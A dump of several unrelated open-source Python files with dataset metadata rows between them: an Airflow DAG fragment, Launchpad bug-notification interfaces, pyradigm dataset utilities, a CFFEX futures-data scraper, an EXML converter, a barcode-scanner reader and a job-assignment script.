task_id='ml_engine_training_op',
project_id=PROJECT_ID,
job_id=job_id,
package_uris=[PACKAGE_URI],
training_python_module='trainer.task',
training_args=training_args,
region=REGION,
scale_tier='CUSTOM',
master_type='complex_model_m_gpu',
dag=dag
)
# App Engine deploy new version
t4 = AppEngineVersionOperator(
task_id='app_engine_deploy_version',
project_id=PROJECT_ID,
service_id='default',
region=REGION,
service_spec=None,
dag=dag
)
t2.set_upstream(t1)
t3.set_upstream(t2)
t4.set_upstream(t3)
| apache-2.0 | 4,713,744,455,293,275,000 | 27.760736 | 84 | 0.700725 | false | 3.389732 | false | false | false |
abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/bugs/interfaces/bugnotification.py | 1 | 4408 | # Copyright 2009 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Bug notifications."""
__metaclass__ = type
__all__ = [
'IBugNotification',
'IBugNotificationFilter',
'IBugNotificationRecipient',
'IBugNotificationSet',
]
from lazr.restful.fields import Reference
from zope.interface import (
Attribute,
Interface,
)
from zope.schema import (
Bool,
Choice,
Datetime,
TextLine,
)
from lp import _
from lp.bugs.enums import BugNotificationStatus
from lp.bugs.interfaces.bugsubscriptionfilter import IBugSubscriptionFilter
from lp.registry.interfaces.role import IHasOwner
from lp.services.fields import BugField
class IBugNotification(IHasOwner):
"""A textual representation of bug changes."""
id = Attribute('id')
message = Attribute(
"The message containing the text representation of the changes"
" to the bug.")
activity = Attribute(
"The bug activity object corresponding to this notification. Will "
"be None for older notification objects, and will be None if the "
"bugchange object that provides the data for the change returns None "
"for getBugActivity.")
bug = BugField(title=u"The bug this notification is for.",
required=True)
is_comment = Bool(
title=u"Comment", description=u"Is the message a comment?",
required=True)
date_emailed = Datetime(
title=u"Date emailed",
description=u"When was the notification sent? None, if it hasn't"
" been sent yet.",
required=False)
recipients = Attribute(
"The people to which this notification should be sent.")
status = Choice(
title=_("Status"), required=True,
vocabulary=BugNotificationStatus,
default=BugNotificationStatus.PENDING,
description=_(
"The status of this bug notification."),
)
bug_filters = Attribute(
"List of bug filters that caused this notification.")
class IBugNotificationSet(Interface):
"""The set of bug notifications."""
def getNotificationsToSend():
"""Returns the notifications pending to be sent."""
def getDeferredNotifications():
"""Returns the deferred notifications.
A deferred noticiation is one that is pending but has no recipients.
"""
def addNotification(self, bug, is_comment, message, recipients, activity):
"""Create a new `BugNotification`.
Create a new `BugNotification` object and the corresponding
`BugNotificationRecipient` objects.
"""
def getRecipientFilterData(bug, recipient_to_sources, notifications):
"""Get non-muted recipients mapped to sources & filter descriptions.
:param bug:
A bug we are collecting filter data for.
:param recipient_to_sources:
A dict of people who are to receive the email to the sources
(BugNotificationRecipients) that represent the subscriptions that
caused the notifications to be sent.
:param notifications: the notifications that are being communicated.
The dict of recipients may have fewer recipients than were
provided if those users muted all of the subscription filters
that caused them to be sent.
"""
class IBugNotificationRecipient(Interface):
"""A recipient of a bug notification."""
bug_notification = Attribute(
"The bug notification this recipient should receive.")
person = Attribute(
"The person to send the bug notification to.")
reason_header = TextLine(
title=_('Reason header'),
description=_("The value for the "
"`X-Launchpad-Message-Rationale` header."))
reason_body = TextLine(
title=_('Reason body'),
description=_("The reason for this notification."))
class IBugNotificationFilter(Interface):
"""`BugSubscriptionFilter` that generated a bug notification."""
bug_notification = Reference(
IBugNotification,
title=_("Bug notification"),
required=True, readonly=True)
bug_subscription_filter = Reference(
IBugSubscriptionFilter,
title=_("Bug subscription filter"),
required=True, readonly=True)
| agpl-3.0 | 8,563,591,084,256,852,000 | 32.648855 | 78 | 0.661298 | false | 4.822757 | false | false | false |
raamana/pyradigm | pyradigm/utils.py | 1 | 13549 |
from collections import Iterable
import numpy as np
from pyradigm.base import missing_value_indicator
from pyradigm import ClassificationDataset, RegressionDataset
from pyradigm.pyradigm import MLDataset
feat_generator = np.random.randn
from pyradigm.base import is_iterable_but_not_str, BaseDataset
from warnings import warn
def load_dataset(ds_path):
"""Convenience utility to quickly load any type of pyradigm dataset"""
try:
ds = ClassificationDataset(dataset_path=ds_path)
except:
try:
ds = RegressionDataset(dataset_path=ds_path)
except:
try:
warn('MLDtaset is deprecated. Switch to the latest pyradigm data '
'structures such as ClassificationDataset or '
'RegressionDataset as soon as possible.')
ds = MLDataset(filepath=ds_path)
except:
raise TypeError('Dataset class @ path below not recognized!'
' Must be a valid instance of one of '
'ClassificationDataset or '
'RegressionDataset or MLDataset.\n'
' Ignoring {}'.format(ds_path))
return ds
def load_arff_dataset(ds_path):
"""Convenience utility to quickly load ARFF files into pyradigm format"""
try:
ds = ClassificationDataset.from_arff(ds_path)
except:
try:
ds = RegressionDataset.from_arff(ds_path)
except:
try:
ds = MLDataset(arff_path=ds_path)
except:
raise TypeError('Error in loading the ARFF dataset @ path below!'
' Ignoring {}'.format(ds_path))
return ds
def check_compatibility(datasets,
class_type,
reqd_num_features=None,
):
"""
Checks whether the given Dataset instances are compatible
i.e. with same set of subjects, each with the same target in all instances.
Checks the first dataset in the list against the rest, and returns a boolean array.
Parameters
----------
datasets : Iterable
A list of n datasets
class_type : class
Class of the datasets being compared e.g. ClassificationDataset or
RegressionDataset or [the deprecated] MLDataset.
All datasets being compared must be of the same class type.
reqd_num_features : int
The required number of features in each dataset.
Helpful to ensure test sets are compatible with training set,
as well as within themselves.
Returns
-------
all_are_compatible : bool
Boolean flag indicating whether all datasets are compatible or not
compatibility : list
List indicating whether first dataset is compatible with the rest individually.
This could be useful to select a subset of mutually compatible datasets.
Length : n-1
dim_mismatch : bool
Boolean flag indicating mismatch in dimensionality from that specified
size_descriptor : tuple
A tuple with values for (num_samplets, reqd_num_features)
- num_samplets must be common for all datasets that are evaluated for compatibility
- reqd_num_features is None (when no check on dimensionality is perfomed), or
list of corresponding dimensionalities for each input dataset
"""
from collections import Iterable
if not is_iterable_but_not_str(datasets):
raise TypeError('Input must be an iterable '
'i.e. (list/tuple) of MLdataset/similar instances')
datasets = list(datasets) # to make it indexable if coming from a set
num_datasets = len(datasets)
check_dimensionality = False
dim_mismatch = False
if reqd_num_features is not None:
if isinstance(reqd_num_features, Iterable):
if len(reqd_num_features) != num_datasets:
raise ValueError(
'Specify dimensionality for exactly {} datasets.'
' Given for a different number {}'
''.format(num_datasets, len(reqd_num_features)))
reqd_num_features = list(map(int, reqd_num_features))
else: # same dimensionality for all
reqd_num_features = [int(reqd_num_features)] * num_datasets
check_dimensionality = True
else:
# to enable iteration
reqd_num_features = [None, ] * num_datasets
pivot = datasets[0]
if isinstance(pivot, str):
pivot = class_type(dataset_path=pivot)
elif not isinstance(pivot, BaseDataset):
raise TypeError('All datasets in pyradigm must be subclasses of '
'BaseDataset')
if check_dimensionality and pivot.num_features != reqd_num_features[0]:
warn('Dimensionality mismatch! Expected {} whereas current {}.'
''.format(reqd_num_features[0], pivot.num_features))
dim_mismatch = True
compatible = list()
for ds, reqd_dim in zip(datasets[1:], reqd_num_features[1:]):
if isinstance(ds, str):
ds = class_type(dataset_path=ds)
elif not isinstance(ds, BaseDataset):
raise TypeError('All datasets in pyradigm must be subclasses of '
'BaseDataset')
is_compatible = True
# compound bool will short-circuit, not optim required
if pivot.num_samplets != ds.num_samplets \
or pivot.samplet_ids != ds.samplet_ids \
or pivot.targets != ds.targets:
is_compatible = False
if check_dimensionality and reqd_dim != ds.num_features:
warn('Dimensionality mismatch! '
'Expected {} whereas current {}.'
''.format(reqd_dim, ds.num_features))
dim_mismatch = True
compatible.append(is_compatible)
return all(compatible), compatible, dim_mismatch, \
(pivot.num_samplets, reqd_num_features)
def attr_generator(attr_type, count):
"""Generates distributions of a given type"""
attr_type = attr_type.lower()
if attr_type in ('int', 'age'):
return np.random.randint(100, size=count)
elif attr_type in ('float', 'weight'):
return 100*np.abs(np.random.rand(count))
elif attr_type in ('sex', 'gender'):
return np.random.choice(['male', 'female', 'other'], count, replace=True)
elif attr_type in ('site', ):
return np.random.choice(['site{}'.format(ss) for ss in range(6)],
count, replace=True)
elif isinstance(attr_type, Iterable):
return np.random.choice(attr_type, count, replace=True)
else:
raise ValueError('Invalid type: must be int or float.'
' Or an array of values to sample from.'
' Type can also be age, sex, gender, weight, or site.')
def make_random_dataset(max_num_classes=20,
min_class_size=20,
max_class_size=50,
max_dim=100,
stratified=True,
with_missing_data=False,
class_type=ClassificationDataset,
min_num_classes=2,
attr_names=None,
attr_types=None):
"Generates a random Dataset for use in testing."
smallest = min(min_class_size, max_class_size)
max_class_size = max(min_class_size, max_class_size)
largest = max(50, max_class_size)
largest = max(smallest + 3, largest)
if min_num_classes < 2:
min_num_classes = 2
if max_num_classes <= min_num_classes:
max_num_classes = min_num_classes
num_classes = np.random.randint(min_num_classes, max_num_classes, 1)
if type(num_classes) == np.ndarray:
num_classes = num_classes[0]
if not stratified:
class_sizes = np.random.randint(smallest, largest+1, num_classes)
else:
class_sizes = np.repeat(np.random.randint(smallest, largest), num_classes)
num_samplets = class_sizes.sum()
num_features = np.random.randint(min(3, max_dim), max(3, max_dim), 1)[0]
# feat_names = [ str(x) for x in range(num_features)]
class_ids = list()
labels = list()
for cl in range(num_classes):
if issubclass(class_type, RegressionDataset):
class_ids.append(cl)
else:
class_ids.append('class-{}'.format(cl))
labels.append(int(cl))
# attributes
if attr_names is not None:
if len(attr_names) != len(attr_types):
raise ValueError('Differing number of names and types for attributes!')
attrs = dict()
for name, typ in zip(attr_names, attr_types):
attrs[name] = attr_generator(typ, num_samplets)
ds = class_type()
s_index = 0
for cc, class_ in enumerate(class_ids):
subids = ['s{}-c{}'.format(ix, cc) for ix in range(class_sizes[cc])]
for sid in subids:
features = feat_generator(num_features)
if with_missing_data:
rand_loc = np.random.randint(num_features)
features[rand_loc] = missing_value_indicator
if isinstance(ds, MLDataset):
ds.add_sample(sid, features, int(cc), class_)
else:
if attr_names is not None:
a_values = [ attrs[a_name][s_index] for a_name in attr_names]
ds.add_samplet(sid, features, class_,
attr_names=attr_names, attr_values=a_values)
else:
ds.add_samplet(sid, features, class_)
s_index += 1
return ds
def make_random_ClfDataset(max_num_classes=20,
min_class_size=20,
max_class_size=50,
max_dim=100,
stratified=True,
min_num_classes=2,
attr_names=None,
attr_types=None
):
"Generates a random ClassificationDataset for use in testing."
return make_random_dataset(max_num_classes=max_num_classes,
min_class_size=min_class_size,
max_class_size=max_class_size,
max_dim=max_dim,
stratified=stratified,
class_type=ClassificationDataset,
min_num_classes=min_num_classes,
attr_names=attr_names, attr_types=attr_types)
def make_random_RegrDataset(min_size=20,
max_size=50,
max_dim=100,
with_missing_data=False,
attr_names=None,
attr_types=None
):
"Generates a random ClassificationDataset for use in testing."
smallest = min(min_size, max_size)
max_size = max(min_size, max_size)
largest = max(50, max_size)
largest = max(smallest + 3, largest)
sample_size = np.random.randint(smallest, largest+1)
num_features = np.random.randint(min(3, max_dim), max(3, max_dim), 1)[0]
# attributes
if attr_names is not None:
if len(attr_names) != len(attr_types):
raise ValueError('Differing number of names and types for attributes!')
attrs = dict()
for name, typ in zip(attr_names, attr_types):
attrs[name] = attr_generator(typ, sample_size)
ds = RegressionDataset()
subids = ['s{}'.format(ix) for ix in range(sample_size)]
for counter, sid in enumerate(subids):
features = feat_generator(num_features)
target = np.random.randint(sample_size)
if with_missing_data:
rand_loc = np.random.randint(num_features)
features[rand_loc] = missing_value_indicator
if attr_names is not None:
a_values = [attrs[a_name][counter] for a_name in attr_names]
ds.add_samplet(sid, features, target,
attr_names=attr_names, attr_values=a_values)
else:
ds.add_samplet(sid, features, target)
return ds
def make_random_MLdataset(max_num_classes=20,
min_class_size=20,
max_class_size=50,
max_dim=100,
stratified=True):
"Generates a random MLDataset for use in testing."
return make_random_dataset(max_num_classes=max_num_classes,
min_class_size=min_class_size,
max_class_size=max_class_size,
max_dim=max_dim,
stratified=stratified,
class_type=MLDataset)
def dataset_with_new_features_same_everything_else(in_ds, max_feat_dim):
"""Helper utility for MultiDataset purposes."""
feat_dim = np.random.randint(1, max_feat_dim)
out_ds = in_ds.__class__()
for id_ in in_ds.samplet_ids:
out_ds.add_samplet(id_,
np.random.rand(feat_dim),
target=in_ds.targets[id_])
# copying attr
out_ds.attr = in_ds.attr
out_ds.dataset_attr = in_ds.dataset_attr
out_ds.attr_dtype = in_ds.attr_dtype
return out_ds
| mit | -7,985,475,627,983,962,000 | 36.531856 | 91 | 0.568529 | false | 4.206458 | true | false | false |
wangz/future | obtaindata/obtain_cffex.py | 1 | 5908 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#encoding=utf-8
# pip install BeautifulSoup MySQL-python
# from 20100416
import sys,re,urllib2,urllib,cookielib,chardet,time
from BeautifulSoup import BeautifulSoup,Comment
from datetime import *
import time,logging,MySQLdb
import re
import xml.dom.minidom
import dbconf
reload(sys)
sys.setdefaultencoding('utf8')
logging.basicConfig(filename='futures.log',format='%(asctime)s %(levelname)s %(message)s',level=logging.DEBUG)
# console = logging.StreamHandler();
# console.setLevel(logging.INFO);
# # set a format which is simpler for console use
# formatter = logging.Formatter('LINE %(lineno)-4d : %(levelname)-8s %(message)s');
# # tell the handler to use this format
# console.setFormatter(formatter);
# logging.getLogger('').addHandler(console);
# 中金最少放在1,然后是郑州,2,然后是上海3,然后是大连4
query1 = "insert into tr(og,ct,co,vl,dt) values (%s,%s,%s,%s,%s)"
query2 = "insert into lp(og,ct,co,vl,dt) values (%s,%s,%s,%s,%s)"
query3 = "insert into sp(og,ct,co,vl,dt) values (%s,%s,%s,%s,%s)"
url_date = "20130918"
logging.info("argv count:%s" % len(sys.argv))
if len(sys.argv)>1:
if sys.argv[1]!=None:
url_date = sys.argv[1]
else:
logging.info("未输入日期,则默认处理当前数据!")
now = date.today()
url_date = now.strftime('%Y%m%d')
logging.info("处理日期 url_date: %s",url_date)
'''obtain futures data'''
url_one = "http://www.cffex.com.cn/fzjy/ccpm/%s/%s/index.xml" % (url_date[0:6],url_date[6:8])
try:
f = None
req = urllib2.Request(url=url_one)
req.add_header('Context-Type', 'application/xml')
f = urllib2.urlopen(req)
rawdata = f.read()
if f.geturl().find('error_404') > 0 :
logging.error("此日期无信息!URL:%s" % url_date)
exit(0)
except Exception,e:
logging.error("下载此页信息失败!URL:%s" % url_one)
logging.error(e)
exit(1)
finally:
if f!=None:
f.close()
# f2=open('data_cffex_20130918.xml','w')
# f2.write(rawdata)
# f2.close()
# f3= open('data_cffex_20130918.xml','r')
# rawdata = f3.read()
# f3.close()
#delete already get data
conn = None
cursor = None
try:
conn = MySQLdb.Connection(dbconf.host, dbconf.user, dbconf.password, dbconf.dbname,charset='utf8')
cursor = conn.cursor()
delete_sql = "delete from lp where og='%s' and dt=%s;\
delete from sp where og='%s' and dt=%s;\
delete from tr where og='%s' and dt=%s;"
check_sql = "select count(*) from lp where og='%s' and dt=%s;"
cursor.execute(check_sql % (1,url_date))
logging.info("already get data count need delete: %s" % cursor.fetchall()[0][0])
cursor.execute(delete_sql % (1,url_date,1,url_date,1,url_date))
logging.info(delete_sql % ('中金',url_date,'中金',url_date,'中金',url_date))
except Exception,e:
logging.error(" MySQL server exception!!!")
logging.error(e)
sys.exit(1)
finally:
if cursor!= None:
cursor.close()
if conn!= None:
conn.commit()
conn.close()
ishasdata = False
logging.info("处理URL为:%s" % url_one)
# http://blog.sina.com.cn/s/blog_6d7e5bc301011mvv.html
rawdata = rawdata.replace('encoding="GBK"','encoding="utf-8"')
rawdata = unicode(rawdata,encoding='gbk').encode('utf-8')
dom = xml.dom.minidom.parseString(rawdata)
def getText(nodelist):
rc = []
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc.append(node.data)
return ''.join(rc)
data_c = 0
for e in dom.getElementsByTagName("data"):
data_c+=1
logging.info( "find data count = %s" % data_c)
if data_c > 3:
ishasdata = True
logging.info("obtain data success,start process")
else:
logging.warning("此页未找到足够数据!obtain data failed date: %s" % url_one)
exit(0)
for index,e in enumerate(dom.getElementsByTagName("data")):
shortname = e.getElementsByTagName('shortname')
instrument = e.getElementsByTagName('instrumentId')
dataType = e.getElementsByTagName('dataTypeId') # 0chengjiao 1买danliang 2maidanliang
value = e.getElementsByTagName('volume')
instrument = getText(instrument[0].childNodes).strip()
shortname = getText(shortname[0].childNodes).strip()
dataType = getText(dataType[0].childNodes).strip()
value = getText(value[0].childNodes).strip()
try:
conn = None
cursor = None
conn = MySQLdb.Connection(dbconf.host, dbconf.user, dbconf.password, dbconf.dbname,charset='utf8')
cursor = conn.cursor()
if dataType == '0':
logging.info(query1 % (1,instrument,shortname,value,url_date))
cursor.execute(query1,('1',instrument,shortname,value,url_date))
if dataType == '1':
logging.info(query2 % (1,instrument,shortname,value,url_date))
cursor.execute(query2,('1',instrument,shortname,value,url_date))
if dataType == '2':
logging.info(query3 % (1,instrument,shortname,value,url_date))
cursor.execute(query3,('1',instrument,shortname,value,url_date))
except Exception,e:
logging.error(" MySQL server exception!!!")
logging.error(e)
sys.exit(1)
finally:
if cursor!= None:
cursor.close()
if conn!= None:
conn.commit()
conn.close()
time.sleep(1)
from smtpmail import send_mail
send_mail(["51649548@qq.com"],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date))
send_mail(["aaronfu@triumphantbank.com"],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date))
send_mail(["johlu@triumphantbank.com"],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date))
send_mail(["dangwannian@triumphantbank"],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date))
| apache-2.0 | 7,432,032,874,748,383,000 | 29.928177 | 110 | 0.645766 | false | 2.835866 | false | false | false |
yv/exmldoc | py_src/exmldoc/__main__.py | 1 | 4583 | from __future__ import print_function
import optparse
import xml.etree.cElementTree as etree
from exmldoc import make_syntax_doc, process_schema, fill_attributes
def exml_lint_main(argv=None):
"""
Reads an EXML file and writes it back in normal form,
allowing a conversion between ExportXML and EXML-JSON
This file also demonstrates the use of exmldoc to stream
a larger document
"""
encoding = 'UTF-8'
oparse = optparse.OptionParser()
opts, args = oparse.parse_args(argv)
ctx = etree.iterparse(args[0], events=('start', 'end'))
doc = make_syntax_doc()
f_out = open(args[1], 'wb')
state = 'BEFORE_HEAD'
markable_stack = []
cur_pos = 0
last_stop = 0
in_word = False
for evt, elem in ctx:
if state == 'BEFORE_HEAD' and evt == 'end' and elem.tag == 'schema':
process_schema(doc, elem)
print('<?xml version="1.0" encoding="%s"?>' %
(encoding,), file=f_out)
print('<exml-doc>', file=f_out)
doc.describe_schema(f_out, encoding=encoding)
state = 'BEFORE_BODY'
elif state == 'BEFORE_BODY' and evt == 'start' and elem.tag == 'body':
state = 'IN_BODY'
print('<body serialization="inline">', file=f_out)
elif state == 'IN_BODY':
if evt == 'end' and elem.tag == 'body':
# TODO wrap up all loose ends
pass
elif evt == 'start':
# create markable
# TODO if a markable or word does not have an XML-id,
# assign one by default
if elem.tag == 'word':
schema = doc.t_schema
obj = schema.create_from_xml(elem, doc, encoding)
obj.span = [cur_pos, None]
doc.add_terminal(obj)
doc.object_by_id[obj.xml_id] = obj
in_word = True
else:
# set start point
try:
schema = doc.schema_by_name(elem.tag)
except KeyError:
# assume it's an edge; we'll deal with it later
if in_word:
(schema, obj) = (doc.t_schema, doc.words[-1])
elif markable_stack:
(schema, obj) = markable_stack[-1]
else:
schema = obj = None
try:
edge_schema = schema.edge_by_name(elem.tag)
except KeyError:
edge_schema = None
if edge_schema is not None:
pass
else:
print("No schema:", elem.tag, [
s.name for s in doc.schemas])
else:
obj = schema.create_from_xml(elem, doc, encoding)
obj.span = [cur_pos, None]
markable_stack.append((schema, obj))
elif evt == 'end':
# print elem.tag, markable_stack
if elem.tag == 'word':
in_word = False
cur_pos += 1
elif elem.tag == 'body':
fill_attributes(elem, doc, encoding)
elem.clear()
# write out part of the document
doc.write_inline_xml(f_out, last_stop, cur_pos)
doc.clear_markables(last_stop, cur_pos)
last_stop = cur_pos
state = 'AFTER_BODY'
elif markable_stack and elem.tag == markable_stack[-1][0].name:
# set end point of markable
(schema, obj) = markable_stack.pop()
obj.span[1] = cur_pos
doc.register_object(obj, schema)
if elem.tag == 'text':
# if it's a text markable, fill attributes and empty out
# the element
fill_attributes(elem, doc, encoding)
elem.clear()
# write out part of the document
doc.write_inline_xml(f_out, last_stop, cur_pos)
doc.clear_markables(last_stop, cur_pos)
last_stop = cur_pos
print('</body>', file=f_out)
print('</exml-doc>', file=f_out)
if __name__ == '__main__':
exml_lint_main()
| lgpl-3.0 | -6,588,277,450,625,900,000 | 41.045872 | 79 | 0.458652 | false | 4.377268 | false | false | false |
addisonElliott/SmartShopTouchScreen | Util/scanner.py | 1 | 9453 | import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from Util.exception import *
from Util import constants
from datetime import date, datetime
if sys.platform.startswith("linux"):
from evdev import *
from evdev.ecodes import *
import re
keycodeToASCII = {
KEY_1: ['1', '!'], KEY_2: ['2', '@'], KEY_3: ['3', '#'], KEY_4: ['4', '$'], KEY_5: ['5', '%'], KEY_6: ['6', '^'],
KEY_7: ['7', '*'], KEY_8: ['8', '('], KEY_9: ['9', '('], KEY_0: ['0', ')'], KEY_MINUS: ['-', '_'], KEY_EQUAL: ['=', '+'],
KEY_TAB: ['\t', '\t'], KEY_Q: ['q', 'Q'], KEY_W: ['w', 'W'], KEY_E: ['e', 'E'], KEY_R: ['r', 'R'], KEY_T: ['t', 'T'],
KEY_Y: ['y', 'Y'], KEY_U: ['u', 'U'], KEY_I: ['i', 'I'], KEY_O: ['o', 'O'], KEY_P: ['p', 'P'], KEY_LEFTBRACE: ['[', '{'],
KEY_RIGHTBRACE: [']', '}'], KEY_ENTER: ['\r\n', '\r\n'], KEY_A: ['a', 'A'], KEY_S: ['s', 'S'], KEY_D: ['d', 'D'],
KEY_F: ['f', 'F'], KEY_G: ['g', 'G'], KEY_H: ['h', 'H'], KEY_J: ['j', 'J'], KEY_K: ['k', 'K'], KEY_L: ['l', 'L'],
KEY_SEMICOLON: [';', ':'], KEY_APOSTROPHE: ['\'', '\"'], KEY_GRAVE: ['`', '~'], KEY_BACKSLASH: ['\\', '|'], KEY_Z: ['z', 'Z'],
KEY_X: ['x', 'X'], KEY_C: ['c', 'C'], KEY_V: ['v', 'V'], KEY_B: ['b', 'B'], KEY_N: ['n', 'N'], KEY_M: ['m', 'M'],
KEY_COMMA: [',', '<'], KEY_DOT: ['.', '>'], KEY_SLASH: ['/', '?'], KEY_SPACE: [' ', ' ']
}
numpadcodeToASCII = {
KEY_KPASTERISK: '*', KEY_KP7: '7', KEY_KP8: '8', KEY_KP9: '9', KEY_KPMINUS: '-', KEY_KP4: '4', KEY_KP5: '5', KEY_KP6: '6',
KEY_KPPLUS: '+', KEY_KP1: '1', KEY_KP2: '2', KEY_KP3: '3', KEY_KP0: '0', KEY_KPDOT: '.', KEY_KPSLASH: '/'
}
class BarcodeScanner(QObject):
# Signal is emitted once a barcode has been scanned and received
barcodeReceived = pyqtSignal(str)
def __init__(self, parent, usbPortNumber, shortcut=None, scannerTitle=None):
QObject.__init__(self, parent)
self.parent = parent
self.modifiers = {
KEY_RIGHTMETA: 0, # Right GUI - (usually the Windows key)
KEY_RIGHTALT: 0, # Right ALT
KEY_RIGHTSHIFT: 0, # Right Shift
KEY_RIGHTCTRL: 0, # Right Control
KEY_LEFTMETA: 0, # Left GUI - (again, usually the Windows key)
KEY_LEFTALT: 0, # Left ALT
KEY_LEFTSHIFT: 0, # Left Shift
KEY_LEFTCTRL: 0 # Left Control
}
self.state = {
KEY_CAPSLOCK: 0, # Caps Lock
KEY_NUMLOCK: 0, # Num Lock
KEY_SCROLLLOCK: 0, # Scroll Lock
}
# Setup the device by calling setPort with the desired port number
self.usbPortNumber = None
self.device = None
self.setPort(usbPortNumber)
# Set the current string buffer to none
self.curStr = ""
# Set the current string buffer to none
if shortcut is not None:
self.shortcut = QShortcut(shortcut, self.parent)
self.shortcut.activated.connect(self.shortcut_activated)
if scannerTitle:
self.shortcutMessage = "Enter %s barcode: " % scannerTitle
else:
self.shortcutMessage = "Enter barcode: "
def setPort(self, usbPortNumber):
# Do nothing if the given port is the same as the current port
if self.usbPortNumber == usbPortNumber:
return
if constants.barcodeScannerDeviceEnable:
# If this scanner already has a device, ungrab it since were done with it
if self.device:
self.device.ungrab()
# This regex expression identifies a device on a specified USB port number
# I am not entirely sure if this is Raspbian specific, Linux specific or what,
# but it works in this case
rePhysicalLoc = re.compile("usb\-.*\..*\-1\.%i.*" % usbPortNumber)
# Loop through all available devices and search for a regex match
# First match found is the device we will use
devices = [InputDevice(fn) for fn in list_devices()]
self.device = None
for device in devices:
if rePhysicalLoc.match(device.phys) is not None:
self.device = device
break
# If unable to find the device at port number, raise error
if self.device is None:
raise SmartShopException("Unable to find input device located at port %i" % usbPortNumber)
# Grab current device so that no one else can receive input events from it
self.device.grab()
# Get the current state of the LED buttons; update self.state with the values that are on
ledStates = self.device.leds()
if LED_CAPSL in ledStates: self.state[KEY_CAPSLOCK] = 1
if LED_NUML in ledStates: self.state[KEY_NUMLOCK] = 1
if LED_SCROLLL in ledStates: self.state[KEY_SCROLLLOCK] = 1
# Set current port number to the given port number
self.usbPortNumber = usbPortNumber
def poll(self):
try:
if constants.barcodeScannerDeviceEnable:
# Read all of the events from the loop
deviceEvents = self.device.read()
for event in deviceEvents:
# Only accept keyboard events
if event.type is EV_KEY:
keyEvent = util.categorize(event)
if keyEvent.scancode in self.modifiers:
if keyEvent.keystate is events.KeyEvent.key_down: self.modifiers[keyEvent.scancode] = 1
elif keyEvent.keystate is events.KeyEvent.key_up: self.modifiers[keyEvent.scancode] = 0
elif keyEvent.scancode in self.state:
if keyEvent.keystate is events.KeyEvent.key_down: self.state[keyEvent.scancode] = 1
elif keyEvent.keystate is events.KeyEvent.key_up: self.state[keyEvent.scancode] = 0
elif keyEvent.keystate is events.KeyEvent.key_down or keyEvent.keystate is events.KeyEvent.key_hold:
if keyEvent.scancode is KEY_ENTER:
# Clear the curStr variable because recursion may occur where a barcode scan happens
# inside the barcodeReceived signal
emitStr = self.curStr
self.curStr = ""
self.barcodeReceived.emit(emitStr)
elif keyEvent.scancode in keycodeToASCII:
shift = (self.modifiers[KEY_LEFTSHIFT] or self.modifiers[KEY_RIGHTSHIFT])
self.curStr += keycodeToASCII[keyEvent.scancode][shift]
elif keyEvent.scancode in numpadcodeToASCII and self.state[KEY_NUMLOCK]:
string = numpadcodeToASCII[keyEvent.scancode]
except BlockingIOError:
# If no events are available, this is thrown
# No actual error, move on
pass
@pyqtSlot()
def shortcut_activated(self):
barcode, ok = QInputDialog.getText(self.parent, "Scanner Input", self.shortcutMessage, QLineEdit.Normal, "",
Qt.WindowSystemMenuHint | Qt.WindowTitleHint | Qt.WindowCloseButtonHint)
if ok and barcode:
self.barcodeReceived.emit(barcode)
elif sys.platform.startswith("win32"):
class BarcodeScanner(QObject):
# Signal is emitted once a barcode has been scanned and received
barcodeReceived = pyqtSignal(str)
def __init__(self, parent, usbPortNumber, shortcut=None, scannerTitle=None):
QObject.__init__(self, parent)
self.parent = parent
# There is no need to implement the actual barcode reader on Windows since we are using Raspberry Pi 3
# Set the current string buffer to none
if shortcut is not None:
self.shortcut = QShortcut(shortcut, self.parent)
self.shortcut.activated.connect(self.shortcut_activated)
if scannerTitle:
self.shortcutMessage = "Enter %s barcode: " % scannerTitle
else:
self.shortcutMessage = "Enter barcode: "
def setPort(self, usbPortNumber):
# Do nothing
pass
def poll(self):
# Do nothing in poll
pass
@pyqtSlot()
def shortcut_activated(self):
barcode, ok = QInputDialog.getText(self.parent, "Scanner Input", self.shortcutMessage, QLineEdit.Normal, "",
Qt.WindowSystemMenuHint | Qt.WindowTitleHint | Qt.WindowCloseButtonHint)
if ok and barcode:
self.barcodeReceived.emit(barcode.strip()) | agpl-3.0 | 3,383,333,563,418,400,000 | 49.287234 | 134 | 0.520787 | false | 4.108214 | false | false | false |
benjaminnow/swimapp | job_choosing.py | 1 | 3447 | from db import *
import random
from operator import itemgetter
def get_min():
conn, cur = connection()
cur.execute('SELECT minimum FROM jobs')
draws = cur.fetchall()
count = 0
for i in range(len(draws)):
count += draws[i]['minimum']
return count
def get_available():
conn, cur = connection()
cur.execute('SELECT COUNT(*) FROM here')
people = cur.fetchall()
peoplenum = people[0]['COUNT(*)']
return peoplenum
def get_job_total():
conn, cur = connection()
cur.execute('SELECT job_total FROM here')
ids = cur.fetchall()
total = 0
for i in range(len(ids)):
total += ids[i]['job_total']
conn.close()
return total
def high_low():
start = 0
conn, cur = connection()
cur.execute('SELECT job_total, id FROM here')
ids = cur.fetchall()
for i in range(len(ids)):
low = start
high = start + ids[i]['job_total']
start = high
ids[i]['low'] = low
ids[i]['high'] = high
conn.close()
return ids
def choose_people():
rangeDict = high_low()
#print(len(rangeDict))
rangeList = list(high_low())
total = get_job_total()
print('Total is ' + str(total))
count = get_min()
idList = []
start = 0
'''
* I cant change the variable in range function when a for loop happens. If no Break, it breaks loop because pop happened
* sometimes it is not found in list
'''
for i in range(count):
randnum = random.randint(1, total)
# print(randnum)
# found = False
for j in range(len(rangeList)):
if randnum > rangeList[j]['low'] and randnum <= rangeList[j]['high']:
idList.append([rangeList[j]['id'], rangeList[j]['job_total']])
total -= rangeList[j]['job_total']
# print('FOUND ' + str(rangeList[j]['id']))
#print(total)
rangeList.pop(j)
# found = True
break
# if not found:
# print('not found!!!')
# print(rangeList)
# print('TOTAL IS ' + str(total))
# found = False
for k in range(len(rangeList)):
low = start
high = start + rangeList[k]['job_total']
start = high
rangeList[k]['low'] = low
rangeList[k]['high'] = high
#print(rangeList)
start = 0
idList.sort(key=itemgetter(1), reverse=True)
conn, cur = connection()
